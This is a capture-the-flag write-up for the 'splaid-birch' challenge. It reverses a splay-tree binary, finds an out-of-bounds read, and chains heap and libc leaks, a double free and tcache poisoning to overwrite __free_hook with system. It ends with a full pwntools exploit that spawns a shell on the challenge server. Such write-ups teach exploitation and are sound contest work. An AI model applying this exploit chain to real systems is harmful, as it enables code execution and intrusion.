In this writeup we will show how we reversed an implementation of Splay Trees, found an out of bound read, and used it to cause a double free and exploit the libc tcache to achieve code execution.
Overview
We are given an ELF 64-bit x86/64 stripped binary, a libc and an external library lisplaid.so.1
. After reversing this library a bit, we realized that it is an implementation of Splay Trees.
From wikipedia:
A splay tree is a self-balancing binary search tree
with the additional property that recently accessed
elements are quick to access again.
Reversing the binary
Running checksec on the binary shows us that all mitigations are enabled:
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
Looking at the binary, we identified the following structures:
struct sp_tree {
sp_node *root_node;
void *func_1;
void (*func_2)(sp_node *);
void *func_3;
int64_t allocated_sz;
int64_t sz;
super_node **nodes;
};
struct sp_node {
sp_node *parent;
sp_node *left;
sp_node *right;
int64_t sz;
};
struct super_node
{
int64_t node_val;
int64_t node_val_2;
/* unknown fields */
int64_t unk_4;
int64_t unk_1;
/* ============== */
int64_t node_i;
sp_node node;
};
In the main function, an sp_tree
struct is created on the stack and initialized like so:
sp_tree tree;
tree.root_node = 0LL;
tree.func_1 = 0LL;
tree.func_2 = 0LL;
tree.func_3 = 0LL;
tree.sz = 0LL;
tree.allocated_sz = 0xALL;
tree.nodes = (super_node **)malloc_(0x50uLL);
/* libsplaid.so.1 function */
sp_init(&tree, func_3, func_1, func_2);
func_1
, func_2
and func_3
are defined in the binary, and serve as comparators for the operations performed by the Splay Tree implementation.
The program then takes our input as unsigned longs and assigns it to the variables op
, v3
, v5
and v6
. Then, it runs it through the following switch statement:
switch ( op ){
case 5uLL:
op_5_add_node(&tree, v5, v6);
break;
case 1uLL:
op_1_del_node(&tree, v5);
break;
case 2uLL:
v7 = op_2_get(&tree, v5);
print_nr(v7);
break;
case 3uLL:
v8 = op_3_nth(&tree, v5);
print_nr(v8);
break;
case 4uLL:
v9 = op_4_select(&tree, v5);
print_nr(v9);
break;
case 6uLL:
v10 = op_6_isolate_1(&tree, v5, v6);
print_nr((__int64)v10);
break;
case 7uLL:
op_7_isolate_2(&tree, v5, v6, v3);
break;
case 0uLL:
result = 0LL;
v12 = *MK_FP(__FS__, 40LL) ^ v14;
return result;
default:
continue;
}
There are three important functions to look at:
op_1_del_node
op_4_select
op_5_add_node
op_1_del_node
op_1_del_node
simply calls sp_del
with the provided node_val
and then uses it to find and free the corresponding node in the tree.
void op_1_del_node(sp_tree *tree, unsigned __int64 node_i_to_del)
{
void *v2;
v2 = sp_del(tree, node_i_to_del);
if ( v2 )
{
tree->nodes[*((_QWORD *)v2 - 1)] = 0LL;
free((char *)v2 - 40);
}
}
op_5_add_node
The op_5_add_node
function checks the amount of nodes added so far. If this amount matches the currently allocated size, then a realloc is performed on the tree->nodes
array and with double it’s original size. If there is no free space adjacent to the buffer that’s being reallocated, it will free the previous buffer and allocate a new one, with the specified size. The contents of the previous buffer are then copied to the new one. This will be handy for our exploit.
Also, if sp_add
does not successfully add the new node, it will be freed. One of the ways sp_add
can fail is by adding a node with a node->node_val
equal to another node already on the tree.
void op_5_add_node(sp_tree *tree, __int64 a2, __int64 a3)
{
__int64 v3;
__int64 v4;
super_node *new_node;
int64_t v6;
v3 = a2;
v4 = a3;
new_node = (super_node *)malloc_(0x48uLL);
v6 = tree->sz;
if ( v6 == tree->allocated_sz )
{
tree->allocated_sz = 2 * v6;
tree->nodes = (super_node **)realloc_(tree->nodes, 16 * v6);
}
new_node->node_i = tree->sz;
new_node->node_val = v3;
new_node->node_val_2 = v4;
new_node->unk_4 = 0LL;
if ( sp_add(tree, &new_node->node) )
{
tree->nodes[new_node->node_i] = new_node;
++tree->sz;
}
else
{
free(new_node);
}
}
Given this, we have pretty much full control over the operations performed on the tree.
The vulnerability: op_4_select
Let’s look at the op_4_select
function:
// (...)
case 4uLL:
v9 = op_4_select(&tree, v5);
print_nr(v9); // node->node_val_2 is printed
break;
// (...)
int64_t __fastcall op_4_select(sp_tree *tree, __int64 node_idx) {
super_node *v2; // rbx@1
v2 = tree->nodes[node_idx]; // OOBR here
sp_select(tree, &v2->node);
return v2->node_val_2;
}
By controlling the node_idx
parameter (which we do) we can perform an sp_select
on any “node” on the heap, since there is no bounds check. The sp_select
function looks like this:
/* libsplaid.so.1 */
sp_node sp_select(sp_tree *tree, sp_node *node_to_select) {
sp_node *result;
result = splay(node_to_select, tree->func_2);
tree->root_node = result;
return result;
}
We have to ensure a couple of things to guarantee the program doesn’t crash during the splay:
node_to_select
is a valid pointer to a node (or null)node_to_select->parent
,node_to_select->left
,node_to_select->right
are all null or another valid node
Solution
Heap Leak
To defeat ASLR we need to leak some addresses. The first leak we need is a heap address. This will allow us to have more control over the fake node we are selecting. We achieve this with the Out-Of-Bounds Read
(OOBR) we found before.
After a bit of experimentation, we were able to setup the heap to have this fake node we can index to (and doesn’t crash on splay):
tree->nodes[node_idx]
|
v
0x555555758858: 0x0000000000000000 --> node->node_val
0x555555758860: 0x0000555555758718 --> node->node_val_2 (will be printed)
0x555555758868: 0x0000000000000000 --> node->unk_4
0x555555758870: 0x0000000000000006 --> node->unk_1
0x555555758878: 0x000000000001f791 --> node->node_i
0x555555758880: 0x0000000000000000 --> node->parent
0x555555758888: 0x0000000000000000 --> node->left
0x555555758890: 0x0000000000000000 --> node->right
0x555555758898: 0x0000000000000000 --> node->sz
As we have seen before node->node_val_2
is printed, allowing us to leak an heap address and de-randomize the heap.
This is the code we wrote to accomplish it:
# ==========
# Leak heap ptr
# ==========
log.info("Leaking a heap addr:")
# This values were found by trial and error
N = 16
del_N = 10
idx = 27
# Create and delete nodes to setup the heap for our leak
for _ in range(N):
create_node(s)
for k in range(del_N):
del_node(s, k)
# `select_node` is vulnerable to an OOBR
# By selecting a fake 'node' in the heap, we get a heap pointer leak
leak = int(select_node(s, idx))
Libc Leak
Now that we know the address of the heap, we can place our own addresses of fake nodes instead of relying on the ones already there on the heap.
To start we just reset the tree to avoid crashing on further operations from having added an invalid node for the leak. We do it with select_node(s, del_N + 1)
, which simply selects one of the valid nodes we had inserted before. The sp_select
function does tree->root_node = result
and so we just go back to the original (not corrupted) state.
Before leaking a libc address we also need to make one show up on the heap. To do this we’ll trigger a realloc
in the op_5_add_node
function, which, since there is no continuous space available, will free tree->nodes
and copy the data to a new malloc’ed area. The block being freed is large and therefore does not go on the tcache or fastbins, but is instead placed in the unsorted chunk list, which is a doubly linked list. As a comment in glibc’s source code mentions:
“Place the chunk in unsorted chunk list. Chunks are not placed into regular bins until after they have been given one chance to be used in malloc.”
Being the only chunk in the list at this moment, both the forward and back pointers, now point to the main_arena
which is the structure in libc that holds these lists of free chunks.
Having this address on the heap we can now leak it. We spray the heap with an address so that node->node_val_2
points to the libc address and then index into it with op_4_select
as we did before.
The last thing we need to make sure is that the realloc’ed chunk is placed before the old free chunk so we can use positive indexes in op_4_select
. To do this we delete all the nodes we inserted except the last few ones to prevent the realloc from extending the old chunk. This way the new chunk is placed before the old chunk. (afterwards we realized we could use negative indexes as well, so this step was unecessary)
This is the code we wrote to accomplish it:
# ==========
# Leak libc addr
# ==========
log.info("Leaking a libc addr:")
# Create nodes just before a call to `realloc` for the `tree->nodes`
# Put the addr where our libc leak will be in the node so we can then index into it
leak_libc_addr = heap + 720
for _ in range(305 - 1):
create_node(s, arg2=leak_libc_addr)
# Delete most nodes inserted to get space for the next `realloc`
# We need this to ensure the realloc comes above the alocated nodes so we can index into it
for k in range(j - 1, 10, -1):
del_node(s, k)
# Trigger the `realloc`
create_node(s, arg2=leak_libc_addr)
leak_libc_idx = (0xb48 / 8)
leak_libc = int(select_node(s, leak_libc_idx))
Exploiting the Tcache
Ok, we have all these leaks, but how do we get code execution? Our goal was to overwrite the __free_hook
function pointer located in the libc, which, if not null, is called whenever free is called.
If we can somehow make it point to system
, we can then do the following:
- Add a node with value
"/bin/sh\x00"
(will be the root of the tree) - Add a node with value
"/bin/sh\x00"
(will fail and be freed)
This last step will make sp_add
fail, because no two nodes can have the same value. This causes a call to free(node)
and since we overwrote the __free_hook
pointer with system
, it will also call system("/bin/sh\x00")
.
So:
- We can create nodes of size 72 and control their
node->node_val
andnode->node_val_2
- We can delete (free) nodes which will end up on the tcache. The pointer to the
next
free chunk in the tcache_entry will be exactly in the same offset as ournode->node_val
field.
By exploiting the OOBR again we can cause a double free of a node by:
- creating a node
- deleting it
- selecting it (with our OOBR), making it part of the tree again
- deleting it the second time
We use this to corrupt tcache_entry->next
and make malloc return an arbitrary pointer (in our case to __free_hook
) as shown in the image below and commented on the exploit code.
This is the code we wrote to accomplish it:
m1_addr = heap + 14800
idx_for_m1_addr = (0x16e0 / 8)
idx_for_nulls = idx_for_m1_addr + 1
# This node is used to keep the pointer to m1 and a pointer to a 'null' node (aka no parent, left or right)
create_node(s, m1_addr, pointer_to_nulls)
# Create m1, the node we will want to free twice
m1 = create_node(s)
# Free m1, the first time
del_node(s, m1)
# Select m1's addr and free it again
select_node(s, idx_for_m1_addr)
del_node(s, 0)
# m2 will get the same addr as m1.
# Corrupt: m1->next == `__free_hook`
m2 = create_node(s, free_hook, 0)
select_node(s, idx_for_nulls)
m3 = create_node(s)
# m4 will get the addr of `__free_hook`. Write `system` there!
m4 = create_node(s, system, 0)
# Creats a node pointing to "/bin/sh\x00"
create_node(s, u64("/bin/sh\x00"), 0)
# Adding a second node with the same val will fail and result in `free(node_2)`
# We made `__free_hook` point to system and so we get `system("/bin/sh\x00")`
create_node(s, u64("/bin/sh\x00"), 0)
Exploit
#!/usr/bin/python2
# -*- coding: utf-8 -*-
from pwn import *
import sys
LOCAL = True
WAIT = False
PRELOAD = False
if "remote" in sys.argv:
LOCAL = False
elif "wait" in sys.argv:
WAIT = True
if "preload" in sys.argv:
PRELOAD = True
elf = None
libc = None
def get_conn():
global elf
global libc
elf = ELF(PROG_NAME)
if LIBC_NAME != '':
libc = ELF(LIBC_NAME)
if LOCAL:
env = {"LD_LIBRARY_PATH": os.getcwd()}
if LIBC_NAME and PRELOAD:
env["LD_PRELOAD"] = LIBC_NAME
log.info("LD_PRELOAD = %s" % env)
cmd = []
cmd.append(PROG_NAME)
s = process(cmd, env=env)
if WAIT:
pause()
else:
s = remote(HOST, PORT)
return s
# ==================================================================
# ==================================================================
# ==================================================================
context.clear(log_level='info', arch="amd64", kernel='amd64', os='linux')
LIBC_NAME = ""
PROG_NAME = "./splaid-birch-patched"
HOST = "splaid-birch.pwni.ng"
PORT = 17579
j = 0
def create_node(s, arg1=None, arg2=None):
global j
if arg1 == None:
arg1 = j
j += 1
if arg2 == None:
arg2 = 0
log.debug("create_node(%s, %s)" % (hex(arg1), hex(arg2)))
s.sendline("5")
s.sendline(str(arg1))
s.sendline(str(arg2))
return arg1
def del_node(s, arg1):
log.debug("del_node(%s)" % (hex(arg1),))
s.sendline("1")
s.sendline(str(arg1))
def select_node(s, offset):
log.debug("select_node(%s)" % (hex(offset),))
s.sendline("4")
s.sendline(str(offset))
return s.recvline()
def go():
global j
s = get_conn()
# ==========
# Leak heap ptr
# ==========
log.info("Leaking a heap addr:")
# Create and delete nodes to setup the heap for our leak
N = 16
del_N = 10
idx = 27
for _ in range(N):
create_node(s)
for k in range(del_N):
del_node(s, k)
# `select_node` is vulnerable to an OOBR
# By selecting a fake 'node' in the heap, we get a heap pointer leak
# We used `test_leak` to find this fake node which leaked without crashing
leak = int(select_node(s, idx))
heap = leak - 1816 # 0x555555758000
pointer_to_nulls = heap + 35016
log.success("\t leak @ %s" % (hex(leak)))
log.success("\t heap @ %s" % (hex(heap)))
assert heap & 0xfff == 0
# By selecting one of the nodes we create earlier we avoid further insertions crashing
# Our fake node will now not be a part of the tree anymore
select_node(s, del_N + 1)
# ==========
# Leak libc addr
# ==========
log.info("Leaking a libc addr:")
# Create nodes just before a call to `realloc` for the `nodes_lst[]`
# Put the addr where our libc leak will be in the node so we can then index into it
leak_libc_addr = heap + 720
for _ in range(305 - 1):
create_node(s, arg2=leak_libc_addr)
# Delete most nodes inserted to get space for the next `realloc`
# We need this to ensure the realloc comes above the alocated nodes so we can index into it
for k in range(j - 1, 10, -1):
del_node(s, k)
# Trigger the `realloc`
create_node(s, arg2=leak_libc_addr)
leak_libc_idx = (0xb48 / 8)
leak_libc = int(select_node(s, leak_libc_idx))
libc = leak_libc - 0x3ebfb0
free_hook = libc + 0x3ed8e8
system = libc + 0x4f440
log.success("\t leak_libc @ %s" % (hex(leak_libc)))
log.success("\t libc @ %s" % (hex(libc)))
log.success("\t free hook @ %s" % (hex(free_hook)))
log.success("\t system @ %s" % (hex(system)))
assert libc & 0xfff == 0
log.info("Corrupting a tcache->next pointer:")
# Just create some nodes to clear the tcache bins
j = 1000
for _ in range(100):
create_node(s)
m1_addr = heap + 14800
idx_for_m1_addr = (0x16e0 / 8)
idx_for_nulls = idx_for_m1_addr + 1
# This node is used to keep the pointer to m1 and a pointer to a 'null' node (aka no parent, left or right)
create_node(s, m1_addr, pointer_to_nulls)
# Create m1, the node we will want to free twice
m1 = create_node(s)
# Free m1, the first time
del_node(s, m1)
# Select m1's addr and free it again
select_node(s, idx_for_m1_addr)
del_node(s, 0)
# m2 will get the same addr as m1.
# Corrupt: m1->next == `__free_hook`
m2 = create_node(s, free_hook, 0)
select_node(s, idx_for_nulls)
m3 = create_node(s)
# m4 will get the addr of `__free_hook`. Write `system` there!
m4 = create_node(s, system, 0)
# Creats a node where the starts with "/bin/sh\x00"
create_node(s, u64("/bin/sh\x00"), 0)
# Adding a second node with the same val will fail and result in `free(node_2)`
# We made `__free_hook` point to system and so we get `system("/bin/sh\x00")`
create_node(s, u64("/bin/sh\x00"), 0)
# ==========
# Got a shell!
# ==========
s.interactive()
go()